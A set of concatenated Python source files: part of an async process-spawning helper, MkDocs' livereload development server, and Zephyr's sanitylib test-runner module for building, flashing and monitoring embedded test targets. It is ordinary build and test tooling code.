f"from ampel.util.concurrent import spawn_main; spawn_main({read_fd}, {write_fd})",
)
async def launch(self) -> Any:
prep_data = spawn.get_preparation_data(self._name)
prep_data["process_name"] = self._name
fp = io.BytesIO()
set_spawning_popen(self)
try:
reduction.dump(prep_data, fp)
reduction.dump(self, fp)
finally:
set_spawning_popen(None)
parent_r, child_w = aiopipe.aiopipe()
child_r, parent_w = aiopipe.aiopipe()
with child_r.detach() as crx, child_w.detach() as ctx:
proc = await asyncio.subprocess.create_subprocess_exec(
*self._get_command_line(crx._fd, ctx._fd),
pass_fds=sorted(p._fd for p in (crx, ctx)),
start_new_session=True,
)
# Processes labeled with the same name are identified by replica number
# for monitoring purposes. Numbers are reused from smallest to largest
# in order to keep their cardinality as small as possible, e.g. if
# replicas 0,1,3,4 are live, the next number should be 2.
if self._name in self._active:
replica_idx = expired.pop() if (expired := self._expired.get(self._name, None)) else max(self._active[self._name].keys())+1
self._active[self._name][replica_idx] = proc.pid
else:
replica_idx = 0
self._active[self._name] = {replica_idx: proc.pid}
try:
async with parent_w.open() as tx:
tx.write(fp.getbuffer())
await tx.drain()
async with parent_r.open() as rx:
try:
exitcode, payload = await asyncio.gather(
proc.wait(), rx.read(), return_exceptions=True
)
if isinstance(exitcode, BaseException):
raise exitcode
elif exitcode < 0:
signame = signal.Signals(-exitcode).name
raise RuntimeError(f"Process {self._name} (pid {proc.pid}) died on {signame}")
if isinstance(payload, BaseException):
raise payload
else:
ret = reduction.pickle.loads(payload)
if isinstance(ret, BaseException):
raise ret
else:
return ret
except asyncio.CancelledError:
proc.terminate()
try:
await asyncio.wait_for(proc.wait(), self._timeout)
except asyncio.TimeoutError:
proc.kill()
await asyncio.gather(proc.wait(), rx.read())
raise
finally:
# Clean up replica numbers and pids
del self._active[self._name][replica_idx]
if not self._active[self._name]:
# this was the only active replica for this name; drop all bookkeeping for it
del self._active[self._name]
self._expired.pop(self._name, None)
else:
# at least one other process of the same name; recycle replica
if self._name in self._expired:
self._expired[self._name].add(replica_idx)
else:
self._expired[self._name] = {replica_idx}
if "PROMETHEUS_MULTIPROC_DIR" in os.environ:
prometheus_cleanup_worker(proc.pid)
_registered_functions = {}
def _register_function(function):
global _registered_functions
_registered_functions[(function.__qualname__, function.__module__)] = function
def _trampoline(name, module, *args, **kwargs):
"""Trampoline function for decorators.
Looks up the function among the registered ones;
if not found, forces its registration and then executes it.
"""
function = _function_lookup(name, module)
return function(*args, **kwargs)
def _function_lookup(name, module):
"""Searches the function between the registered ones.
If not found, it imports the module forcing its registration.
"""
if module == "__main__":
module = "__mp_main__"
try:
return _registered_functions[(name, module)]
except KeyError: # force function registering
__import__(module)
return _registered_functions[(name, module)]
def _process_wrapper(function, timeout=3.0):
# keep the wrapped function so we can actually call it
_register_function(function)
@wraps(function)
def wrapper(*args, **kwargs):
target = _trampoline
args = [function.__qualname__, function.__module__] + list(args)
proc = _Process(target=target, timeout=timeout, args=args, kwargs=kwargs)
return asyncio.create_task(proc.launch())
return wrapper
|
__init__.py | import functools
import io
import logging
import mimetypes
import os
import os.path
import pathlib
import re
import socketserver
import threading
import time
import warnings
import wsgiref.simple_server
import wsgiref.util
import watchdog.events
import watchdog.observers
class _LoggerAdapter(logging.LoggerAdapter):
def process(self, msg, kwargs):
return time.strftime("[%H:%M:%S] ") + msg, kwargs
log = _LoggerAdapter(logging.getLogger(__name__), {})
class LiveReloadServer(socketserver.ThreadingMixIn, wsgiref.simple_server.WSGIServer):
daemon_threads = True
poll_response_timeout = 60
def __init__(
self,
builder,
host,
port,
root,
mount_path="/",
build_delay=0.25,
shutdown_delay=0.25,
**kwargs,
):
self.builder = builder
self.server_name = host
self.server_port = port
self.root = os.path.abspath(root)
self.mount_path = ("/" + mount_path.lstrip("/")).rstrip("/") + "/"
self.url = f"http://{self.server_name}:{self.server_port}{self.mount_path}"
self.build_delay = build_delay
self.shutdown_delay = shutdown_delay
# To allow custom error pages.
self.error_handler = lambda code: None
super().__init__((host, port), _Handler, **kwargs)
self.set_app(self.serve_request)
self._wanted_epoch = _timestamp() # The version of the site that started building.
self._visible_epoch = self._wanted_epoch # Latest fully built version of the site.
self._epoch_cond = threading.Condition() # Must be held when accessing _visible_epoch.
self._to_rebuild = {} # Used as an ordered set of functions to call.
self._rebuild_cond = threading.Condition() # Must be held when accessing _to_rebuild.
self._shutdown = False
self.serve_thread = threading.Thread(target=lambda: self.serve_forever(shutdown_delay))
self.observer = watchdog.observers.Observer(timeout=shutdown_delay)
def watch(self, path, func=None, recursive=True):
"""Add the 'path' to watched paths, call the function and reload when any file changes under it."""
path = os.path.abspath(path)
if func in (None, self.builder):
func = self.builder
else:
warnings.warn(
"Plugins should not pass the 'func' parameter of watch(). "
"The ability to execute custom callbacks will be removed soon.",
DeprecationWarning,
stacklevel=2,
)
def callback(event, allowed_path=None):
if isinstance(event, watchdog.events.DirCreatedEvent):
return
if allowed_path is not None and event.src_path != allowed_path:
return
# Text editors always cause a "file close" event in addition to "modified" when saving
# a file. Some editors also have "swap" functionality that keeps writing into another
# file that's never closed. Prevent such write events from causing a rebuild.
if isinstance(event, watchdog.events.FileModifiedEvent):
# But FileClosedEvent is implemented only on Linux, otherwise we mustn't skip this:
if type(self.observer).__name__ == "InotifyObserver":
return
log.debug(str(event))
with self._rebuild_cond:
self._to_rebuild[func] = True
self._rebuild_cond.notify_all()
dir_handler = watchdog.events.FileSystemEventHandler()
dir_handler.on_any_event = callback
seen = set()
def schedule(path):
seen.add(path)
if path.is_file():
# Watchdog doesn't support watching files, so watch its directory and filter by path
handler = watchdog.events.FileSystemEventHandler()
handler.on_any_event = lambda event: callback(event, allowed_path=os.fspath(path))
parent = path.parent
log.debug(f"Watching file '{path}' through directory '{parent}'")
self.observer.schedule(handler, parent)
else:
log.debug(f"Watching directory '{path}'")
self.observer.schedule(dir_handler, path, recursive=recursive)
schedule(pathlib.Path(path).resolve())
def watch_symlink_targets(path_obj): # path is os.DirEntry or pathlib.Path
if path_obj.is_symlink():
path_obj = pathlib.Path(path_obj).resolve()
if path_obj in seen or not path_obj.exists():
return
schedule(path_obj)
if path_obj.is_dir() and recursive:
with os.scandir(os.fspath(path_obj)) as scan:
for entry in scan:
watch_symlink_targets(entry)
watch_symlink_targets(pathlib.Path(path))
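# Usage sketch (builder callback, paths and port are placeholders):
#     server = LiveReloadServer(builder=rebuild_site, host="localhost", port=8000, root="site")
#     server.watch("docs/")   # rebuild and reload browsers when anything under docs/ changes
#     server.serve()          # blocks: starts the observer, the request thread and the build loop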
def serve(self):
self.observer.start()
log.info(f"Serving on {self.url}")
self.serve_thread.start()
self._build_loop()
def _build_loop(self):
while True:
with self._rebuild_cond:
while not self._rebuild_cond.wait_for(
lambda: self._to_rebuild or self._shutdown, timeout=self.shutdown_delay
):
# We could have used just one wait instead of a loop + timeout, but we need
# occasional breaks, otherwise on Windows we can't receive KeyboardInterrupt.
pass
if self._shutdown:
break
log.info("Detected file changes")
while self._rebuild_cond.wait(timeout=self.build_delay):
log.debug("Waiting for file changes to stop happening")
self._wanted_epoch = _timestamp()
funcs = list(self._to_rebuild)
self._to_rebuild.clear()
for func in funcs:
func()
with self._epoch_cond:
log.info("Reloading browsers")
self._visible_epoch = self._wanted_epoch
self._epoch_cond.notify_all()
def shutdown(self):
self.observer.stop()
with self._rebuild_cond:
self._shutdown = True
self._rebuild_cond.notify_all()
if self.serve_thread.is_alive():
super().shutdown()
self.serve_thread.join()
self.observer.join()
def serve_request(self, environ, start_response):
try:
result = self._serve_request(environ, start_response)
except Exception:
code = 500
msg = "500 Internal Server Error"
log.exception(msg)
else:
if result is not None:
return result
code = 404
msg = "404 Not Found"
error_content = None
try:
error_content = self.error_handler(code)
except Exception:
log.exception("Failed to render an error message!")
if error_content is None:
error_content = msg.encode()
start_response(msg, [("Content-Type", "text/html")])
return [error_content]
def _serve_request(self, environ, start_response):
# https://bugs.python.org/issue16679
# https://github.com/bottlepy/bottle/blob/f9b1849db4/bottle.py#L984
path = environ["PATH_INFO"].encode("latin-1").decode("utf-8", "ignore")
m = re.fullmatch(r"/livereload/([0-9]+)/[0-9]+", path)
if m:
epoch = int(m[1])
start_response("200 OK", [("Content-Type", "text/plain")])
def condition():
return self._visible_epoch > epoch
with self._epoch_cond:
if not condition():
# Stall the browser, respond as soon as there's something new.
# If there's not, respond anyway after a minute.
self._log_poll_request(environ.get("HTTP_REFERER"), request_id=path)
self._epoch_cond.wait_for(condition, timeout=self.poll_response_timeout)
return [b"%d" % self._visible_epoch]
if path == "/js/livereload.js":
file_path = os.path.join(os.path.dirname(os.path.abspath(__file__)), "livereload.js")
elif path.startswith(self.mount_path):
if path.endswith("/"):
path += "index.html"
path = path[len(self.mount_path):]
file_path = os.path.join(self.root, path.lstrip("/"))
elif path == "/":
start_response("302 Found", [("Location", self.mount_path)])
return []
else:
return None # Not found
# Wait until the ongoing rebuild (if any) finishes, so we're not serving a half-built site.
with self._epoch_cond:
self._epoch_cond.wait_for(lambda: self._visible_epoch == self._wanted_epoch)
epoch = self._visible_epoch
try:
file = open(file_path, "rb")
except OSError:
return None # Not found
if path.endswith(".html"):
with file:
content = file.read()
content = self._inject_js_into_html(content, epoch)
file = io.BytesIO(content)
content_length = len(content)
else:
content_length = os.path.getsize(file_path)
content_type = self._guess_type(file_path)
start_response(
"200 OK", [("Content-Type", content_type), ("Content-Length", str(content_length))]
)
return wsgiref.util.FileWrapper(file)
@classmethod
def _inject_js_into_html(cls, content, epoch):
try:
body_end = content.rindex(b"</body>")
except ValueError:
body_end = len(content)
# The page will reload if the livereload poller returns a newer epoch than what it knows.
# The other timestamp becomes just a unique identifier for the initiating page.
return (
b'%b<script src="/js/livereload.js"></script><script>livereload(%d, %d);</script>%b'
% (content[:body_end], epoch, _timestamp(), content[body_end:])
)
@classmethod
@functools.lru_cache() # "Cache" to not repeat the same message for the same browser tab.
def _log_poll_request(cls, url, request_id):
log.info(f"Browser connected: {url}")
@classmethod
def _guess_type(cls, path):
# MkDocs only ensures a few common types (as seen in livereload_tests.py::test_mime_types).
# Other uncommon types will not be accepted.
if path.endswith((".js", ".JS")):
return "application/javascript"
if path.endswith(".gz"):
return "application/gzip"
guess, _ = mimetypes.guess_type(path)
if guess:
return guess
return "application/octet-stream"
class _Handler(wsgiref.simple_server.WSGIRequestHandler):
def log_request(self, code="-", size="-"):
level = logging.DEBUG if str(code) == "200" else logging.WARNING
log.log(level, f'"{self.requestline}" code {code}')
def log_message(self, format, *args):
log.debug(format, *args)
def _timestamp():
return round(time.monotonic() * 1000)
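# Illustrative sketch (not part of the module above): the reload handshake
# implemented by _inject_js_into_html() and _serve_request(). Each served page
# carries the epoch it was rendered from; the injected script long-polls
# /livereload/<epoch>/<id> and reloads once the server reports a newer visible
# epoch. All numeric values below are invented for demonstration.
def _livereload_handshake_example():
    import re

    rendered_epoch = 1000     # epoch baked into the served HTML
    visible_epoch = 1002      # a newer build finished in the meantime
    poll_path = "/livereload/%d/12345" % rendered_epoch
    m = re.fullmatch(r"/livereload/([0-9]+)/[0-9]+", poll_path)
    should_reload = visible_epoch > int(m[1])
    return should_reload      # True -> the browser refreshes the page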
|
sanitylib.py | #!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import threading
import concurrent.futures
from collections import OrderedDict
from threading import BoundedSemaphore
import queue
import time
import csv
import glob
import concurrent
import xml.etree.ElementTree as ET
import logging
import pty
from pathlib import Path
import traceback
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts"))
import edtlib # pylint: disable=unused-import
hw_map_local = threading.Lock()
report_lock = threading.Lock()
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
from sanity_chk import scl
from sanity_chk import expr_parser
logger = logging.getLogger('sanitycheck')
logger.setLevel(logging.DEBUG)
pipeline = queue.LifoQueue()
class CMakeCacheEntry:
'''Represents a CMake cache entry.
This class understands the type system in a CMakeCache.txt, and
converts the following cache types to Python types:
Cache Type Python type
---------- -------------------------------------------
FILEPATH str
PATH str
STRING str OR list of str (if ';' is in the value)
BOOL bool
INTERNAL str OR list of str (if ';' is in the value)
---------- -------------------------------------------
'''
# Regular expression for a cache entry.
#
# CMake variable names can include escape characters, allowing a
# wider set of names than is easy to match with a regular
# expression. To be permissive here, use a non-greedy match up to
# the first colon (':'). This breaks if the variable name has a
# colon inside, but it's good enough.
CACHE_ENTRY = re.compile(
r'''(?P<name>.*?) # name
:(?P<type>FILEPATH|PATH|STRING|BOOL|INTERNAL) # type
=(?P<value>.*) # value
''', re.X)
@classmethod
def _to_bool(cls, val):
# Convert a CMake BOOL string into a Python bool.
#
# "True if the constant is 1, ON, YES, TRUE, Y, or a
# non-zero number. False if the constant is 0, OFF, NO,
# FALSE, N, IGNORE, NOTFOUND, the empty string, or ends in
# the suffix -NOTFOUND. Named boolean constants are
# case-insensitive. If the argument is not one of these
# constants, it is treated as a variable."
#
# https://cmake.org/cmake/help/v3.0/command/if.html
val = val.upper()
if val in ('ON', 'YES', 'TRUE', 'Y'):
return 1
elif val in ('OFF', 'NO', 'FALSE', 'N', 'IGNORE', 'NOTFOUND', ''):
return 0
elif val.endswith('-NOTFOUND'):
return 0
else:
try:
v = int(val)
return v != 0
except ValueError as exc:
raise ValueError('invalid bool {}'.format(val)) from exc
@classmethod
def from_line(cls, line, line_no):
# Comments can only occur at the beginning of a line.
# (The value of an entry could contain a comment character).
if line.startswith('//') or line.startswith('#'):
return None
# Whitespace-only lines do not contain cache entries.
if not line.strip():
return None
m = cls.CACHE_ENTRY.match(line)
if not m:
return None
name, type_, value = (m.group(g) for g in ('name', 'type', 'value'))
if type_ == 'BOOL':
try:
value = cls._to_bool(value)
except ValueError as exc:
args = exc.args + ('on line {}: {}'.format(line_no, line),)
raise ValueError(args) from exc
elif type_ in ['STRING', 'INTERNAL']:
# If the value is a CMake list (i.e. is a string which
# contains a ';'), convert to a Python list.
if ';' in value:
value = value.split(';')
return CMakeCacheEntry(name, value)
def __init__(self, name, value):
self.name = name
self.value = value
def __str__(self):
fmt = 'CMakeCacheEntry(name={}, value={})'
return fmt.format(self.name, self.value)
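# Illustrative sketch (not part of the original script): how from_line() maps
# a few representative CMakeCache.txt lines to Python values, following the
# table in the class docstring. The sample entries are invented.
def _cmake_cache_entry_examples():
    samples = [
        'CONFIG_XIP:BOOL=ON',                      # value converted via _to_bool()
        'ZEPHYR_TOOLCHAIN_VARIANT:STRING=zephyr',  # plain string value
        'EXTRA_FILES:STRING=a.c;b.c',              # ';' -> list of strings
        '// lines starting with // are comments and yield None',
    ]
    return [CMakeCacheEntry.from_line(line, line_no)
            for line_no, line in enumerate(samples)]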
class CMakeCache:
'''Parses and represents a CMake cache file.'''
@staticmethod
def from_file(cache_file):
return CMakeCache(cache_file)
def __init__(self, cache_file):
self.cache_file = cache_file
self.load(cache_file)
def load(self, cache_file):
entries = []
with open(cache_file, 'r') as cache:
for line_no, line in enumerate(cache):
entry = CMakeCacheEntry.from_line(line, line_no)
if entry:
entries.append(entry)
self._entries = OrderedDict((e.name, e) for e in entries)
def get(self, name, default=None):
entry = self._entries.get(name)
if entry is not None:
return entry.value
else:
return default
def get_list(self, name, default=None):
if default is None:
default = []
entry = self._entries.get(name)
if entry is not None:
value = entry.value
if isinstance(value, list):
return value
elif isinstance(value, str):
return [value] if value else []
else:
msg = 'invalid value {} type {}'
raise RuntimeError(msg.format(value, type(value)))
else:
return default
def __contains__(self, name):
return name in self._entries
def __getitem__(self, name):
return self._entries[name].value
def __setitem__(self, name, entry):
if not isinstance(entry, CMakeCacheEntry):
msg = 'improper type {} for value {}, expecting CMakeCacheEntry'
raise TypeError(msg.format(type(entry), entry))
self._entries[name] = entry
def __delitem__(self, name):
del self._entries[name]
def __iter__(self):
return iter(self._entries.values())
class SanityCheckException(Exception):
pass
class SanityRuntimeError(SanityCheckException):
pass
class ConfigurationError(SanityCheckException):
def __init__(self, cfile, message):
SanityCheckException.__init__(self, cfile + ": " + message)
class BuildError(SanityCheckException):
pass
class ExecutionError(SanityCheckException):
pass
class HarnessImporter:
def __init__(self, name):
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/sanity_chk"))
module = __import__("harness")
if name:
my_class = getattr(module, name)
else:
my_class = getattr(module, "Test")
self.instance = my_class()
class Handler:
def __init__(self, instance, type_str="build"):
"""Constructor
"""
self.lock = threading.Lock()
self.state = "waiting"
self.run = False
self.duration = 0
self.type_str = type_str
self.binary = None
self.pid_fn = None
self.call_make_run = False
self.name = instance.name
self.instance = instance
self.timeout = instance.testcase.timeout
self.sourcedir = instance.testcase.source_dir
self.build_dir = instance.build_dir
self.log = os.path.join(self.build_dir, "handler.log")
self.returncode = 0
self.set_state("running", self.duration)
self.generator = None
self.generator_cmd = None
self.args = []
def set_state(self, state, duration):
self.lock.acquire()
self.state = state
self.duration = duration
self.lock.release()
def get_state(self):
self.lock.acquire()
ret = (self.state, self.duration)
self.lock.release()
return ret
def record(self, harness):
if harness.recording:
filename = os.path.join(self.build_dir, "recording.csv")
with open(filename, "at") as csvfile:
cw = csv.writer(csvfile, harness.fieldnames, lineterminator=os.linesep)
cw.writerow(harness.fieldnames)
for instance in harness.recording:
cw.writerow(instance)
class BinaryHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.terminated = False
self.call_west_flash = False
# Tool options
self.valgrind = False
self.lsan = False
self.asan = False
self.ubsan = False
self.coverage = False
def try_kill_process_by_pid(self):
if self.pid_fn:
pid = int(open(self.pid_fn).read())
os.unlink(self.pid_fn)
self.pid_fn = None # clear so we don't try to kill the binary twice
try:
os.kill(pid, signal.SIGTERM)
except ProcessLookupError:
pass
def terminate(self, proc):
# Encapsulate the terminate functionality so we do it consistently wherever
# we might want to terminate the proc. We need try_kill_process_by_pid
# because of how both newer ninja (1.6.0 or greater) and .NET / renode
# work. Newer ninja versions don't seem to pass SIGTERM down to the children,
# so we need to use try_kill_process_by_pid.
self.try_kill_process_by_pid()
proc.terminate()
# sleep for a while before attempting to kill
time.sleep(0.5)
proc.kill()
self.terminated = True
def _output_reader(self, proc, harness):
log_out_fp = open(self.log, "wt")
for line in iter(proc.stdout.readline, b''):
logger.debug("OUTPUT: {0}".format(line.decode('utf-8').rstrip()))
log_out_fp.write(line.decode('utf-8'))
log_out_fp.flush()
harness.handle(line.decode('utf-8').rstrip())
if harness.state:
try:
# POSIX arch based ztests end on their own,
# so let's give it up to 100ms to do so
proc.wait(0.1)
except subprocess.TimeoutExpired:
self.terminate(proc)
break
log_out_fp.close()
def handle(self):
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
if self.call_make_run:
command = [self.generator_cmd, "run"]
elif self.call_west_flash:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
else:
command = [self.binary]
run_valgrind = False
if self.valgrind and shutil.which("valgrind"):
command = ["valgrind", "--error-exitcode=2",
"--leak-check=full",
"--suppressions=" + ZEPHYR_BASE + "/scripts/valgrind.supp",
"--log-file=" + self.build_dir + "/valgrind.log"
] + command
run_valgrind = True
logger.debug("Spawning process: " +
" ".join(shlex.quote(word) for word in command) + os.linesep +
"in directory: " + self.build_dir)
start_time = time.time()
env = os.environ.copy()
if self.asan:
env["ASAN_OPTIONS"] = "log_path=stdout:" + \
env.get("ASAN_OPTIONS", "")
if not self.lsan:
env["ASAN_OPTIONS"] += "detect_leaks=0"
if self.ubsan:
env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
env.get("UBSAN_OPTIONS", "")
with subprocess.Popen(command, stdout=subprocess.PIPE,
stderr=subprocess.PIPE, cwd=self.build_dir, env=env) as proc:
logger.debug("Spawning BinaryHandler Thread for %s" % self.name)
t = threading.Thread(target=self._output_reader, args=(proc, harness,), daemon=True)
t.start()
t.join(self.timeout)
if t.is_alive():
self.terminate(proc)
t.join()
proc.wait()
self.returncode = proc.returncode
handler_time = time.time() - start_time
if self.coverage:
subprocess.call(["GCOV_PREFIX=" + self.build_dir,
"gcov", self.sourcedir, "-b", "-s", self.build_dir], shell=True)
self.try_kill_process_by_pid()
# FIXME: This is needed when killing the simulator, the console is
# garbled and needs to be reset. Did not find a better way to do that.
subprocess.call(["stty", "sane"])
self.instance.results = harness.tests
if not self.terminated and self.returncode != 0:
# When a process is killed, the default handler returns 128 + SIGTERM
# so in that case the return code itself is not meaningful
self.set_state("failed", handler_time)
self.instance.reason = "Failed"
elif run_valgrind and self.returncode == 2:
self.set_state("failed", handler_time)
self.instance.reason = "Valgrind error"
elif harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state("timeout", handler_time)
self.instance.reason = "Timeout"
self.record(harness)
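# Illustrative sketch (not part of the original script): the sanitizer
# environment that BinaryHandler.handle() above composes before spawning the
# test binary. ASAN output is redirected to stdout, leak detection is gated by
# the --lsan option, and UBSAN halts on the first error; the flag values used
# here are invented.
def _sanitizer_env_example(asan=True, lsan=False, ubsan=True):
    env = {}
    if asan:
        env["ASAN_OPTIONS"] = "log_path=stdout:" + env.get("ASAN_OPTIONS", "")
        if not lsan:
            env["ASAN_OPTIONS"] += "detect_leaks=0"
    if ubsan:
        env["UBSAN_OPTIONS"] = "log_path=stdout:halt_on_error=1:" + \
            env.get("UBSAN_OPTIONS", "")
    return env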
class DeviceHandler(Handler):
def __init__(self, instance, type_str):
"""Constructor
@param instance Test Instance
"""
super().__init__(instance, type_str)
self.suite = None
def monitor_serial(self, ser, halt_fileno, harness):
log_out_fp = open(self.log, "wt")
ser_fileno = ser.fileno()
readlist = [halt_fileno, ser_fileno]
while ser.isOpen():
readable, _, _ = select.select(readlist, [], [], self.timeout)
if halt_fileno in readable:
logger.debug('halted')
ser.close()
break
if ser_fileno not in readable:
continue # Timeout.
serial_line = None
try:
serial_line = ser.readline()
except TypeError:
pass
except serial.SerialException:
ser.close()
break
# Just because ser_fileno has data doesn't mean an entire line
# is available yet.
if serial_line:
sl = serial_line.decode('utf-8', 'ignore').lstrip()
logger.debug("DEVICE: {0}".format(sl.rstrip()))
log_out_fp.write(sl)
log_out_fp.flush()
harness.handle(sl.rstrip())
if harness.state:
ser.close()
break
log_out_fp.close()
def device_is_available(self, instance):
device = instance.platform.name
fixture = instance.testcase.harness_config.get("fixture")
for i in self.suite.connected_hardware:
if fixture and fixture not in i.get('fixtures', []):
continue
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
return True
return False
def get_available_device(self, instance):
device = instance.platform.name
for i in self.suite.connected_hardware:
if i['platform'] == device and i['available'] and (i['serial'] or i.get('serial_pty', None)):
i['available'] = False
i['counter'] += 1
return i
return None
def make_device_available(self, serial):
with hw_map_local:
for i in self.suite.connected_hardware:
if i['serial'] == serial or i.get('serial_pty', None):
i['available'] = True
@staticmethod
def run_custom_script(script, timeout):
with subprocess.Popen(script, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
stdout, _ = proc.communicate(timeout=timeout)
logger.debug(stdout.decode())
except subprocess.TimeoutExpired:
proc.kill()
proc.communicate()
logger.error("{} timed out".format(script))
def handle(self):
out_state = "failed"
while not self.device_is_available(self.instance):
logger.debug("Waiting for device {} to become available".format(self.instance.platform.name))
time.sleep(1)
hardware = self.get_available_device(self.instance)
if hardware:
runner = hardware.get('runner', None) or self.suite.west_runner
serial_pty = hardware.get('serial_pty', None)
if serial_pty:
master, slave = pty.openpty()
try:
ser_pty_process = subprocess.Popen(re.split(',| ', serial_pty), stdout=master, stdin=master, stderr=master)
except subprocess.CalledProcessError as error:
logger.error("Failed to run subprocess {}, error {}".format(serial_pty, error.output))
return
serial_device = os.ttyname(slave)
else:
serial_device = hardware['serial']
logger.debug("Using serial device {}".format(serial_device))
if (self.suite.west_flash is not None) or runner:
command = ["west", "flash", "--skip-rebuild", "-d", self.build_dir]
command_extra_args = []
# There are three ways this option is used.
# 1) bare: --west-flash
# This results in options.west_flash == []
# 2) with a value: --west-flash="--board-id=42"
# This results in options.west_flash == "--board-id=42"
# 3) Multiple values: --west-flash="--board-id=42,--erase"
# This results in options.west_flash == "--board-id=42 --erase"
if self.suite.west_flash and self.suite.west_flash != []:
command_extra_args.extend(self.suite.west_flash.split(','))
if runner:
command.append("--runner")
command.append(runner)
board_id = hardware.get("probe_id", hardware.get("id", None))
product = hardware.get("product", None)
if board_id is not None:
if runner == "pyocd":
command_extra_args.append("--board-id")
command_extra_args.append(board_id)
elif runner == "nrfjprog":
command_extra_args.append("--snr")
command_extra_args.append(board_id)
elif runner == "openocd" and product == "STM32 STLink":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "STLINK-V3":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("hla_serial %s" % (board_id))
elif runner == "openocd" and product == "EDBG CMSIS-DAP":
command_extra_args.append("--cmd-pre-init")
command_extra_args.append("cmsis_dap_serial %s" % (board_id))
elif runner == "jlink":
command.append("--tool-opt=-SelectEmuBySN %s" % (board_id))
if command_extra_args != []:
command.append('--')
command.extend(command_extra_args)
else:
command = [self.generator_cmd, "-C", self.build_dir, "flash"]
pre_script = hardware.get('pre_script')
post_flash_script = hardware.get('post_flash_script')
post_script = hardware.get('post_script')
if pre_script:
self.run_custom_script(pre_script, 30)
try:
ser = serial.Serial(
serial_device,
baudrate=115200,
parity=serial.PARITY_NONE,
stopbits=serial.STOPBITS_ONE,
bytesize=serial.EIGHTBITS,
timeout=self.timeout
)
except serial.SerialException as e:
self.set_state("failed", 0)
self.instance.reason = "Failed"
logger.error("Serial device error: %s" % (str(e)))
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
self.make_device_available(serial_device)
return
ser.flush()
harness_name = self.instance.testcase.harness.capitalize()
harness_import = HarnessImporter(harness_name)
harness = harness_import.instance
harness.configure(self.instance)
read_pipe, write_pipe = os.pipe()
start_time = time.time()
t = threading.Thread(target=self.monitor_serial, daemon=True,
args=(ser, read_pipe, harness))
t.start()
d_log = "{}/device.log".format(self.instance.build_dir)
logger.debug('Flash command: %s', command)
try:
stdout = stderr = None
with subprocess.Popen(command, stderr=subprocess.PIPE, stdout=subprocess.PIPE) as proc:
try:
(stdout, stderr) = proc.communicate(timeout=30)
logger.debug(stdout.decode())
if proc.returncode != 0:
self.instance.reason = "Device issue (Flash?)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.TimeoutExpired:
proc.kill()
(stdout, stderr) = proc.communicate()
self.instance.reason = "Device issue (Timeout)"
with open(d_log, "w") as dlog_fp:
dlog_fp.write(stderr.decode())
except subprocess.CalledProcessError:
os.write(write_pipe, b'x') # halt the thread
if post_flash_script:
self.run_custom_script(post_flash_script, 30)
t.join(self.timeout)
if t.is_alive():
logger.debug("Timed out while monitoring serial output on {}".format(self.instance.platform.name))
out_state = "timeout"
if ser.isOpen():
ser.close()
if serial_pty:
ser_pty_process.terminate()
outs, errs = ser_pty_process.communicate()
logger.debug("Process {} terminated outs: {} errs {}".format(serial_pty, outs, errs))
os.close(write_pipe)
os.close(read_pipe)
handler_time = time.time() - start_time
if out_state == "timeout":
for c in self.instance.testcase.cases:
if c not in harness.tests:
harness.tests[c] = "BLOCK"
self.instance.reason = "Timeout"
self.instance.results = harness.tests
if harness.state:
self.set_state(harness.state, handler_time)
if harness.state == "failed":
self.instance.reason = "Failed"
else:
self.set_state(out_state, handler_time)
if post_script:
self.run_custom_script(post_script, 30)
self.make_device_available(serial_device)
self.record(harness)
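# Illustrative sketch (not part of the original script): how the three
# --west-flash forms described in DeviceHandler.handle() expand into extra
# "west flash" arguments. The option values are invented examples.
def _west_flash_args_example():
    cases = {
        "bare flag": [],                          # --west-flash
        "single value": "--board-id=42",          # --west-flash="--board-id=42"
        "multiple values": "--board-id=42,--erase",
    }
    expanded = {}
    for label, west_flash in cases.items():
        extra = []
        if west_flash and west_flash != []:
            extra.extend(west_flash.split(','))
        expanded[label] = extra
    return expanded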
class QEMUHandler(Handler):
"""Spawns a thread to monitor QEMU output from pipes
We pass QEMU_PIPE to 'make run' and monitor the pipes for output.
We need to do this as once qemu starts, it runs forever until killed.
Test cases emit special messages to the console as they run; we check
for these to determine whether the test passed or failed.
"""
def __init__(self, instance, type_str):
"""Constructor
@param instance Test instance
"""
super().__init__(instance, type_str)
self.fifo_fn = os.path.join(instance.build_dir, "qemu-fifo")
